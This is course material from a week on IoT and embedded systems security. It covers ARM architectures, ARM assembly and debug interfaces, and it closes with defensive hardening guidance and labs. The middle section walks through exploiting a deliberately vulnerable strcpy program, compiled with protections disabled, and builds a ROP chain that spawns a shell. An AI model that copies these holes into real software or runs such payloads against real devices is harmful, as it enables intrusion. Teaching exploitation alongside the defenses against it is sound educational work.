Embedded security connects directly to earlier foundations:
IoT & Embedded Systems Security
Track your progress through this week's content
Opening Framing: The Embedded Reality
IoT security requires understanding the embedded systems that power IoT devices. Unlike
general-purpose computers, embedded systems feature specialized processors (ARM Cortex-M, MIPS,
Xtensa), run bare-metal code or real-time operating systems, and operate under severe resource
constraints. This isn't just academic—these constraints directly create exploitable vulnerabilities.
A smart thermostat might have 256KB of flash and 64KB of RAM. A fitness tracker may run on a battery
for months. A security camera processes video on a <$5 ARM Cortex-M4. These constraints shape every
security decision—or more often, the compromise. Understanding embedded architecture reveals why
certain vulnerabilities exist and how to exploit them.
Why This Week Matters
The Embedded Attack Surface: 75 billion IoT devices are projected by 2025.
Every
smart home, industrial sensor, and medical device runs embedded code. Understanding ARM
assembly
isn't optional—it's how you read the firmware you extract, understand exploit mitigation
bypasses,
and write exploits that actually work on resource-constrained targets.
Real-World Context: Major IoT breaches (Mirai, VPNFilter, Ripple20) all
required
understanding embedded systems to discover and exploit. The URGENT/11 vulnerabilities
affected
VxWorks across 200 million devices—exploiting them required deep embedded knowledge.
Career Relevance: Embedded security specialists are in
high demand. Companies
building IoT products, automotive systems, and medical devices desperately need engineers
who
understand both security and embedded constraints.
Learning Outcomes
By the end of this week, you will be able to:
Identify and compare ARM Cortex-M vs Cortex-A architectures
Understand memory layouts and protection mechanisms in embedded systems
Read basic ARM assembly and trace function execution
Recognize common RTOSes (FreeRTOS, Zephyr) and their security properties
Identify debug interfaces (UART, JTAG, SWD) on target boards
Explain why embedded constraints lead to specific vulnerability classes
Real-World Attack Vectors
MITRE ATT&CK for ICS Mapping:
T0823 - Exploit Public-Facing Application: Embedded web servers
T0886 - Remote Services: Debug interfaces left accessible
Key insight: Embedded systems trade security for resource efficiency. Every feature removed
to save
kilobytes of flash is a potential attack vector. Understanding what's missing helps you
exploit
what's present.
1) Processor Architectures
Understanding processor architectures is fundamental to IoT exploitation. Each architecture has
unique characteristics, security features, and typical deployment patterns. Knowing which processor
powers a target device tells you what tools to use, what exploits might work, and what defenses
you'll encounter.
COMMON IoT OPERATING SYSTEMS:
BARE METAL (No OS):
┌─────────────────────────────────────────────────────────────┐
│ - Direct hardware access │
│ - Simple interrupt-driven loops │
│ - Minimal attack surface │
│ - No process isolation │
│ - Common in simple sensors │
└─────────────────────────────────────────────────────────────┘
FreeRTOS:
┌─────────────────────────────────────────────────────────────┐
│ - Most popular RTOS for microcontrollers │
│ - AWS IoT integration │
│ - Task scheduling, queues, semaphores │
│ - No memory protection between tasks by default │
│ - TLS and crypto libraries available │
└─────────────────────────────────────────────────────────────┘
Zephyr:
┌─────────────────────────────────────────────────────────────┐
│ - Linux Foundation project │
│ - Strong security focus │
│ - Memory protection, secure boot support │
│ - Growing adoption in commercial IoT │
└─────────────────────────────────────────────────────────────┘
Embedded Linux:
┌─────────────────────────────────────────────────────────────┐
│ - Full Linux kernel on Cortex-A or MIPS │
│ - Familiar attack vectors (buffer overflows, privesc) │
│ - BusyBox common (minimal userland) │
│ - Often outdated kernels with known CVEs │
└─────────────────────────────────────────────────────────────┘
4) ARM Assembly Basics
ARM assembly fluency is non-negotiable for IoT exploitation. You need to read disassembly to
understand what firmware does,
write shellcode to exploit vulnerabilities, and build ROP chains to bypass protections. This section
covers the essentials
through a practical exploitation lens.
Registers and Calling Convention
ARM ASSEMBLY FUNDAMENTALS:
REGISTERS (ARM Cortex-M):
┌─────────────────────────────────────────────────────────────┐
│ R0-R12: General purpose │
│ R13 (SP): Stack Pointer │
│ R14 (LR): Link Register (return address) │
│ R15 (PC): Program Counter │
│ CPSR: Current Program Status Register (flags) │
│ │
│ FUNCTION CALLING CONVENTION (AAPCS): │
│ Arguments: R0, R1, R2, R3 (then stack) │
│ Return value: R0 │
│ Callee-saved: R4-R11 (must preserve) │
│ Caller-saved: R0-R3, R12 (can be clobbered) │
└─────────────────────────────────────────────────────────────┘
COMMON INSTRUCTIONS:
┌─────────────────────────────────────────────────────────────┐
│ Data Movement: │
│ MOV R0, #5 ; R0 = 5 (immediate value) │
│ MOV R0, R1 ; R0 = R1 (register to register) │
│ │
│ Arithmetic: │
│ ADD R0, R1, R2 ; R0 = R1 + R2 │
│ SUB R0, R1, #10 ; R0 = R1 - 10 │
│ MUL R0, R1, R2 ; R0 = R1 * R2 │
│ │
│ Memory Access: │
│ LDR R0, [R1] ; Load word from memory @ R1 into R0 │
│ LDR R0, [R1, #4] ; Load from R1 + 4 offset │
│ STR R0, [R1] ; Store R0 to memory @ R1 │
│ LDRB R0, [R1] ; Load byte (8-bit) │
│ │
│ Comparison & Branching: │
│ CMP R0, R1 ; Compare R0 and R1 (set flags) │
│ BEQ label ; Branch if equal (Z flag set) │
│ BNE label ; Branch if not equal │
│ BGT label ; Branch if greater than │
│ B label ; Un conditional branch (goto) │
│ │
│ Function Calls: │
│ BL function ; Branch with link (call function) │
│ ; Saves return addr in LR, jumps to func │
│ BX LR ; Branch exchange, return from function │
│ │
│ Stack Operations: │
│ PUSH {R4-R7, LR} ; Save registers to stack │
│ POP {R4-R7, PC} ; Restore and return (PC = LR) │
└─────────────────────────────────────────────────────────────┘
Stack Buffer Overflow Exploitation
COMPLETE EXPLOITATION WALKTHROUGH:
Vulnerable C Code:
┌─────────────────────────────────────────────────────────────┐
│ #include │
│ #include │
│ │
│ void vulnerable_function(char *input) { │
│ char buffer[64]; │
│ strcpy(buffer, input); // No bounds check! │
│ printf("You entered: %s\n", buffer); │
│ } │
│ │
│ int main(int argc, char **argv) { │
│ if (argc < 2) return 1; │
│ vulnerable_function(argv[1]); │
│ return 0; │
│ } │
└─────────────────────────────────────────────────────────────┘
Compile for ARM (disable protections):
$ arm-linux-gnueabi-gcc -g -fno-stack-protector -z execstack \
-o vuln vuln.c
Generated ARM Assembly (vulnerable_function):
┌─────────────────────────────────────────────────────────────┐
│ vulnerable_function: │
│ PUSH {R4, LR} ; Save R4 and return address │
│ SUB SP, SP, #72 ; Allocate 72 bytes on stack │
│ MOV R4, R0 ; Save input pointer to R4 │
│ ADD R0, SP, #8 ; R0 = &buffer (SP+8) │
│ MOV R1, R4 ; R1 = input │
│ BL strcpy ; Call strcpy (VULNERABLE!) │
│ ... (printf call) │
│ ADD SP, SP, #72 ; Deallocate stack │
│ POP {R4, PC} ; Restore R4 and return (PC=LR) │
└─────────────────────────────────────────────────────────────┘
Stack Layout After PUSH:
┌─────────────────────────────────────────────────────────────┐
│ High Memory │
│ ┌───────────────────────────────────────────────────────┐ │
│ │ Saved R4 │ │
│ ├───────────────────────────────────────────────────────┤ │
│ │ Saved LR (return address) ← TARGET! │ │
│ ├───────────────────────────────────────────────────────┤ │
│ │ 72 bytes local storage │ │
│ │ (buffer starts at SP+8, 64 bytes) │ │
│ └───────────────────────────────────────────────────────┘ │
│ Low Memory (SP points here after SUB) │
└─────────────────────────────────────────────────────────────┘
Exploitation Strategy:
1. Buffer is 64 bytes at SP+8
2. Saved LR is at SP+72 (64 bytes buffer + 8 bytes padding + R4)
3. strcpy will overflow buffer, overwriting saved LR
4. When function returns (POP {R4, PC}), PC gets our value
5. We control program flow!
Building the Exploit:
┌─────────────────────────────────────────────────────────────┐
│ Payload structure: │
│ │
│ [ 64 bytes padding ] Fill buffer │
│ [ 4 bytes junk for R4 ] Overwrite saved R4 │
│ [ 4 bytes return address ] Overwrite saved LR │
│ │
│ Example Python exploit: │
│ payload = b"A" * 64 # Fill buffer │
│ payload += b"BBBB" # Junk for R4 │
│ payload += p32(0xdeadbeef) # New return address │
└─────────────────────────────────────────────────────────────┘
GDB Debugging Workflow:
$ gdb-multiarch ./vuln
(gdb) set architecture arm
(gdb) disassemble vulnerable_function
# Identify offset to saved LR
(gdb) run $(python -c 'print "A"*68 + "BBBB"')
# Program crashes with PC=0x42424242 ("BBBB")
# Confirms we control PC!
(gdb) x/20x $sp
# Examine stack to verify overwrite
Next step: Write ARM shellcode or ROP chain to gain code execution
Return-Oriented Programming (ROP)
ROP EXPLOITATION ON ARM:
Why ROP?
┌─────────────────────────────────────────────────────────────┐
│ - Stack is non-executable (NX bit enabled) │
│ - Can't execute shellcode on stack │
│ - Solution: Chain existing code "gadgets" │
│ - Each gadget ends with BX LR or POP {PC} │
└─────────────────────────────────────────────────────────────┘
Finding Gadgets:
$ ROPgadget --binary ./vuln --arch arm
Useful ARM Gadgets:
┌─────────────────────────────────────────────────────────────┐
│ 0x00010420: pop {r0, pc} ; Load R0 from stack │
│ 0x00010538: pop {r3, pc} ; Load R3 from stack │
│ 0x000106a0: mov r0, r4; blx r3 ; Call function in R3 │
│ 0x00010750: ldr r0, [r4]; bx lr ; Deref pointer in R4 │
└─────────────────────────────────────────────────────────────┘
ROP Chain Example (call system("/bin/sh")):
┌─────────────────────────────────────────────────────────────┐
│ Goal: Execute system("/bin/sh") │
│ │
│ ROP payload: │
│ [padding] + [saved R4] + [ROP chain on stack] │
│ │
│ payload = b"A" * 64 │
│ payload += b"JUNK" # Saved R4 │
│ payload += p32(pop_r0) # PC → pop {r0, pc} │
│ payload += p32(binsh_addr) # R0 = "/bin/sh" │
│ payload += p32(system_addr) # PC → system() │
│ │
│ Execution flow: │
│ 1. Function returns, PC = pop_r0 gadget │
│ 2. Gadget pops binsh_addr into R0, then pops system_addr │
│ into PC │
│ 3. Now executing system() with R0 = "/bin/sh" │
│ 4. Shell spawned! │
└─────────────────────────────────────────────────────────────┘
5) Debug Interfaces
HARDWARE DEBUG INTERFACES:
UART (Universal Asynchronous Receiver/Transmitter):
┌─────────────────────────────────────────────────────────────┐
│ Purpose: Serial console access │
│ Pins: TX, RX, GND (sometimes VCC) │
│ Baud rates: 9600, 115200 common │
│ │
│ Security Value: │
│ - Often provides root shell │
│ - Boot logs reveal system information │
│ - May allow bootloader interrupt │
│ │
│ Identification: │
│ - Look for 4-pin headers on PCB │
│ - Use logic analyzer to detect baud rate │
│ - JTAGulator can automate pin identification │
└─────────────────────────────────────────────────────────────┘
JTAG (Joint Test Action Group):
┌─────────────────────────────────────────────────────────────┐
│ Purpose: Debugging and testing │
│ Pins: TDI, TDO, TCK, TMS, (TRST) │
│ │
│ Capabilities: │
│ - Full processor control (halt, step, run) │
│ - Read/write memory │
│ - Read/write registers │
│ - Dump flash contents │
│ │
│ Tools: OpenOCD, JLink, Bus Pirate │
└─────────────────────────────────────────────────────────────┘
SWD (Serial Wire Debug):
┌─────────────────────────────────────────────────────────────┐
│ Purpose: ARM's 2-wire alternative to JTAG │
│ Pins: SWDIO, SWCLK │
│ Common on: ARM Cortex-M devices │
│ Same capabilities as JTAG │
└─────────────────────────────────────────────────────────────┘
🛡️ Defensive Architecture & Secure Embedded Development
Offensive skills show you how embedded systems break.
Defensive skills show you how to build them securely from day one.
Secure Embedded Development Principles
Building secure embedded systems requires understanding the constraints and working with them,
not against them. Security isn't about adding megabytes of protection\u2014it's about minimizing
attack surface and using hardware security features effectively.
Memory Protection Configuration
ARM Cortex-M MPU Configuration:
// Define region for code (flash) - read-execute only
MPU->RBAR = FLASH_BASE | MPU_RBAR_VALID_Msk | 0;
MPU->RASR = MPU_RASR_ENABLE_Msk | MPU_RASR_XN_Msk |
MPU_RASR_SIZE_512KB | MPU_RASR_AP_ROPRIV;
// Define region for data - read-write, no execute
MPU->RBAR = RAM_BASE | MPU_RBAR_VALID_Msk | 1;
MPU->RASR = MPU_RASR_ENABLE_Msk | MPU_RASR_XN_Msk |
MPU_RASR_SIZE_64KB | MPU_RASR_AP_RWPRIV;
// Enable MPU
MPU->CTRL = MPU_CTRL_ENABLE_Msk | MPU_CTRL_PRIVDEFENA_Msk;
Result: Code execution from RAM blocked, preventing shellcode.
Secure Coding for Embedded
Common Embedded Vulnerabilities & Mitigations:
VULNERABILITY: Stack buffer overflow
BAD: char buf[32]; strcpy(buf, user_input);
GOOD: char buf[32]; strncpy(buf, user_input, sizeof(buf)-1);
buf[sizeof(buf)-1] = '\0';
VULNERABILITY: Integer overflow leading to buffer overflow
BAD: uint8_t len = get_length();
char *buf = malloc(len);
memcpy(buf, data, len);
GOOD: uint16_t len = get_length();
if (len > MAX_ALLOWED) return ERROR;
char *buf = malloc(len + 1); // Account for null
if (!buf) return ERROR;
memcpy(buf, data, len);
VULNERABILITY: Hardcoded credentials
BAD: const char wifi_password[] = "password123";
GOOD: Store credentials in secure flash region or secure element
Use device-unique keys, never hardcode
VULNERABILITY: Unprotected debug interfaces
BAD: UART always enabled with root shell
GOOD: Disable UART in production builds
If needed, require authentication
Use TrustZone to isolate debug functionality
Hardening Checklist
Embedded System Hardening:
✓ Enable MPU/MMU if available
✓ Configure readable/writable/executable permissions
✓ Implement stack canaries (compiler flag: -fstack-protector-all)
✓ Disable JTAG/SWD in production (fuse programming)
✓ Implement secure boot with signature verification
✓ Use hardware crypto accelerator, never roll your own crypto
✓ Generate unique device keys during manufacturing
✓ Implement firmware encryption at rest
✓ Enable anti-rollback protection
✓ Implement input validation on all external data
✓ Minimize code size (reduce attack surface)
✓ Disable unused peripherals and services
✓ Implement watchdog timer for fault recovery
✓ Use TLS 1.3 for network communication
✓ Implement proper random number generation (TRNG)
Real-World Breach: VPNFilter (2018)
VPNFilter infected 500,000+ routers and NAS devices running embedded Linux.
The malware survived reboots by writing to flash, demonstrating persistence
on embedded systems.
Attack Vector: Exploited default credentials and unpatched
vulnerabilities in embedded web servers. Once root access gained, malware
wrote itself to flash for persistence.
Lessons Learned:
Disable default credentials\u2014force password change on first boot
Implement automatic security updates for embedded devices
Use code signing and verified boot to prevent persistent malware
Implement network segmentation\u2014IoT on separate VLAN
Monitor for anomalous firmware modifications
Secure SDLC for Embedded
Embedded Security Development Lifecycle:
1. Requirements Phase:
- Define threat model (STRIDE for embedded)
- Specify security requirements (encryption, auth, updates)
- Choose hardware with security features (MPU, crypto accelerator)
2. Design Phase:
- Architecture review\u2014minimize privile ged code
- Define trust boundaries (TrustZone secure/normal world)
- Plan key management and provisioning
3. Implementation Phase:
- Follow MISRA C or CERT C coding standards
- Use static analysis (Coverity, CodeSonar)
- Implement security features early, not as add-ons
4. Verification Phase:
- Fuzzing on protocol parsers
- Penetration testing (hardware and firmware)
- Side-channel analysis if handling secrets
5. Manufacturing:
- Secure key injection (HSM-based)
- Disable debug interfaces via efuses
- Verify secure boot before shipping
6. Deployment & Maintenance:
- Implement OTA updates with signing
- Monitor for vulnerabilities in dependencies
- Have incident response plan
Defensive Labs
Lab: Configure ARM Cortex-M MPU for W^X
Download ARM Cortex-M example code, configure the MPU to enforce
write-xor-execute (W^X) policy. Test that code execution from RAM fails.
Verify that buffer overflows cannot lead to shellcode execution.
Tools: QEMU ARM emulator, GCC ARM cross-compiler Time: 60 minutes
Lab: Implement Secure Boot Verification
Write a simple bootloader that verifies firmware signature before execution.
Use RSA-2048 or ECDSA-P256. Test that tampered firmware is rejected.
Implement fallback to recovery mode on verification failure.
Tools: OpenSSL for key generation and signing, ARM toolchain Time: 90 minutes
📚 Building on CSY101 Week-13: Use STRIDE to threat model your
embedded system design before implementing.
CSY102 Week-08: Apply cryptographic principles for secure boot and firmware
encryption.
📚 Building on Prior Knowledge
Embedded security connects directly to earlier foundations:
CSY102 Week 08 (Cryptography): Implement AES, ECC on resource-constrained
devices.
CSY103 (Programming): C programming skills essential for embedded development
and exploitation.
CSY104 Week 06 (OS Internals): RTOS concepts build on general OS knowledge.
🎯 Hands-On Labs (Free & Essential)
Apply what you learned through practical embedded system challenges. Complete these
labs
to build hands-on ARM and embedded exploitation skills.
🎮 Azeria Labs: ARM Assembly Basics
What you'll do: Learn ARM assembly from scratch through interactive tutorials.
Understand registers, memory addressing, function calling conventions, and stack operations.
Write and debug simple ARM programs.
Why it matters: ARM assembly is the language of IoT exploitation. You
can't write exploits, analyze malware, or reverse engineer firmware without reading ARM code.
This is foundational for all future IoT security work.
Time estimate: 2-3 hours
What you'll do: Complete the Phoenix ARM exploitation challenges. Start with
stack buffer overflows, progress to format string vulnerabilities, and finish with ROP chains.
Each challenge builds on the previous.
Why it matters: These are real exploitation techniques used against
embedded devices. The skills transfer directly to IoT device exploitation. Understanding how to
exploit ARM binaries is essential for offensive IoT security.
Time estimate: 4-5 hours
What you'll do: Set up QEMU to emulate ARM devices. Install ARM
cross-compilation
toolchain. Compile and run a simple ARM program in QEMU. Set up GDB debugging for ARM binaries.
Why it matters: You can't always test on physical hardware. QEMU
emulation lets you analyze ARM firmware without the device. This setup is used throughout the
rest of the course for firmware analysis.
Time estimate: 1-1.5 hours
💡 Lab Strategy: Start with Azeria Labs to build ARM fundamentals. Then tackle
Phoenix challenges to apply exploitation techniques. Set up QEMU for future firmware analysis work.
Total: 700 XP across 7-9 hours of hands-on learning!
Guided Lab: ARM Assembly with Azeria Labs
Objective: Complete basic ARM assembly exercises to understand embedded code
execution.
Time: 90 minutes
Lab Steps
Set up ARM Environment (20 min):
Use QEMU ARM emulator or Raspberry Pi
Install cross-compiler: arm-linux-gnueabi-gcc
Complete Azeria Labs Part 1 (30 min):
Visit azeria-labs.com ARM Assembly Basics
Work through registers and memory instructions
Analyze a Simple Buffer Overflow (40 min):
Write vulnerable C program with strcpy
Compile with -fno-stack-protector
Use GDB to trace execution and observe LR overwrite
Success Criteria: Successfully traced ARM program execution and
demonstrated stack buffer overflow control of PC.
Reading Resources (Free + Authoritative)
Complete the required resources to deepen your embedded systems understanding.